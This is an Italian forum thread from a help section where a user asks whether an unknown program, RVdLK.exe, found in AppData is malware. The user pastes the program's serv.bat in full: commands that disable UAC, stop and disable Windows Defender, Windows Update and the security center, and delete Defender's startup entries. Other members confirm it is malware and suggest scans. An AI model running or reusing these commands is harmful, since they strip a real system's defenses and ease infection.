Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

OPPO Watch X2 Mini, lo smartwatch compatto a cui non manca nulla
OPPO Watch X2 Mini, lo smartwatch compatto a cui non manca nulla
OPPO Watch X2 Mini è uno smartwatch compatto capace di offrire un'esperienza completa di monitoraggio della salute e fitness con una cassa da 43 mm che può adattarsi a qualsiasi tipo di polso, dal più grande al - soprattutto - più piccolo. Con l'architettura dual-chip e un'autonomia che può coprire due giorni con tranquillità, rappresenta la soluzione ideale per chi cerca prestazioni premium in un formato ridotto.
Xiaomi 15T Pro, è lui il nuovo best buy? La recensione
Xiaomi 15T Pro, è lui il nuovo best buy? La recensione
Dopo il recente lancio della serie Xiaomi 15T di Monaco, vi parliamo oggi della versione più performante della nuova famiglia, ovvero Xiaomi 15 T Pro. Vi raccontiamo la nostra prova nel dettaglio, spiegando perché a questo prezzo e in questa fascia, questo smartphone ha davvero senso tenerlo in seria considerazione.
Acer TravelMate P6 14 AI: il Copilot+ PC sotto il chilo per il professionista in movimento
Acer TravelMate P6 14 AI: il Copilot+ PC sotto il chilo per il professionista in movimento
Acer ha ampliato la sua offerta professionale con il TravelMate P6 14 AI, un notebook ultraleggero e robusto pensato per chi lavora in mobilità. Certificato Copilot+ PC, combina design premium, autonomia elevata e piattaforma Intel Core Ultra Serie 2 con funzionalità AI, garantendo sicurezza, affidabilità e produttività per l'utenza business moderna.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 08-06-2013, 18:10   #1
chairam
Senior Member
 
Iscritto dal: Oct 2001
Messaggi: 518
Virus o troiano non rilevato: ditemi se non lo è questo

Buongiorno
appena successo che windows 7 mi chiede il permesso di eseguire un programma di nome RVdLK
allora indago: scopro che mi trovo questa cartella:
C:\Users\Rob\AppData\Roaming\RVdLK_virus
con data di oggi, io non ricordo di aver installato sta roba e non so cosa sia
il contenuto è:
***********************************
Directory of C:\Users\Rob\AppData\Roaming\RVdLK

08/06/2013 19:00 <DIR> .
08/06/2013 19:00 <DIR> ..
08/06/2013 18:08 0 D1
08/06/2013 18:03 668.160 RVdLK.exe
08/06/2013 18:03 5.430 RVdLK.ico
08/06/2013 18:03 222 RVdLK.ini
08/06/2013 18:03 232 RVdLK.log
08/06/2013 18:08 824 serv.bat
7 File(s) 674.868 bytes
2 Dir(s) 14.864.527.360 bytes free
***********************************
che non si capisce bene cosa sia
riporto serv.bat
che a quanto capisco disattiva sistemi di sicurezza di windows, firewall, antitroiano etc..
***********************************
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
***********************************
nel registro di configurazione ha inserito una chiave in
...\windows\CurrentVersion\Run a nome SD214 che lancia RVdLK.exe

il mio antivirus Avira Free non lo classifica come virus
spybot non ha trovato da lamentarsi

non mi sono fidato, ho negato l'autorizzazione all'esecuzione
ho 'sputtanato' la chiave di registro e la cartella appena apparsa
per me sto coso non è niente di buono

sarei felice di sentire qualche opinione
Grazie
__________________
chairam
chairam è offline   Rispondi citando il messaggio o parte di esso
Old 08-06-2013, 18:33   #2
nV 25
Bannato
 
L'Avatar di nV 25
 
Iscritto dal: Jan 2003
Città: Lucca
Messaggi: 9119
malware al 100%
nV 25 è offline   Rispondi citando il messaggio o parte di esso
Old 08-06-2013, 18:36   #3
nV 25
Bannato
 
L'Avatar di nV 25
 
Iscritto dal: Jan 2003
Città: Lucca
Messaggi: 9119
disabilita l'UAC (reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f) perchè evidentemente richiede privilegi maggiori di quelli standard, ecc.

Malware 100% indipendentemente dal responso di Avira..
nV 25 è offline   Rispondi citando il messaggio o parte di esso
Old 08-06-2013, 18:37   #4
chairam
Senior Member
 
Iscritto dal: Oct 2001
Messaggi: 518
C'è modo di sapere come ha fatto arrivare sul mio hd, come è stato lanciato, installato... qualche indizio insomma, non vorrei trovarmelo reinstallato con un altro nome
__________________
chairam
chairam è offline   Rispondi citando il messaggio o parte di esso
Old 08-06-2013, 18:39   #5
nV 25
Bannato
 
L'Avatar di nV 25
 
Iscritto dal: Jan 2003
Città: Lucca
Messaggi: 9119
giro rapido di hitmanpro/malwarebytes per scrupolo.

Sul sapere da dove è entrato, ci vorrebbe la sfera di cristallo.

Solitamente è il browser:
hai Java?

OS?
UAC (ovviamente) attivo (giusto?) e a su che livello?
nV 25 è offline   Rispondi citando il messaggio o parte di esso
Old 08-06-2013, 19:02   #6
chairam
Senior Member
 
Iscritto dal: Oct 2001
Messaggi: 518
ho java e adesso faccio l'aggiornamento
UAC poi controllo e ti faccio sapere
intanto mote grazie
__________________
chairam
chairam è offline   Rispondi citando il messaggio o parte di esso
Old 10-06-2013, 09:08   #7
chairam
Senior Member
 
Iscritto dal: Oct 2001
Messaggi: 518
os win7 ultimate 64bit
hitman pro mi trova tanti tracking cookie cosa che non mi preoccupa più di tanto
e un paio di malaware

uno dei due è heurlik
simpaticamente avira lanciato sull'eseguibuile non si lamenta neanche (ma che caxxo)

hitman dice anche che ho un proxy in locale questa si cosa brutta ma, pare che sia un falso allarme perchè cercando la sua porta 21320 con netstat -b -a scopro che è sdfssvc.exe che è un eseguibile nella cartella di spybot search&destroy
ma che cavolo fanno queli di spybot search&destroy mi installano un cavolo di proxy che non mi fa più partire alcune applicazioni java e manco me lo dicono accidenti a loro? boh
vale la pena tenerlo sto spybot? da un po' non lo tenevo più perché mi appesantiva troppo la macchina

per il resto pare che il grosso della minaccia sia stato sventato
tnx
__________________
chairam
chairam è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


OPPO Watch X2 Mini, lo smartwatch compatto a cui non manca nulla OPPO Watch X2 Mini, lo smartwatch compatto a cui...
Xiaomi 15T Pro, è lui il nuovo best buy? La recensione Xiaomi 15T Pro, è lui il nuovo best buy? ...
Acer TravelMate P6 14 AI: il Copilot+ PC sotto il chilo per il professionista in movimento Acer TravelMate P6 14 AI: il Copilot+ PC sotto i...
ASUS NUC 15 Pro e NUC 15 Pro+, mini PC che fondono completezza e duttilità ASUS NUC 15 Pro e NUC 15 Pro+, mini PC che fondo...
Cybersecurity: email, utenti e agenti IA, la nuova visione di Proofpoint Cybersecurity: email, utenti e agenti IA, la nuo...
Dacia stupisce con Hypster. Nascono le K...
Dacia svela Spring 2026: nuova batteria ...
Lunedì sera tiratela lunga: a mez...
Il prossimo pieghevole di Huawei potrebb...
Euro digitale nel 2027 con app e infrast...
Galaxy S26 Ultra: tra le novità c...
OneDrive avrà presto una nuova app per W...
Il nuovo OnePlus 15 è pronto: il ...
Non serve essere Prime: 7 offerte bomba ...
Ci sono un sacco di prodotti con lo scon...
Xbox Game Pass, gli aumenti di prezzo pe...
I nuovi top di gamma di HONOR sono pront...
Il Garante della Privacy ha bloccato Clo...
C'è un nuovo operatore virtuale s...
Google Chrome non si ferma più: &...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 05:44.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www3v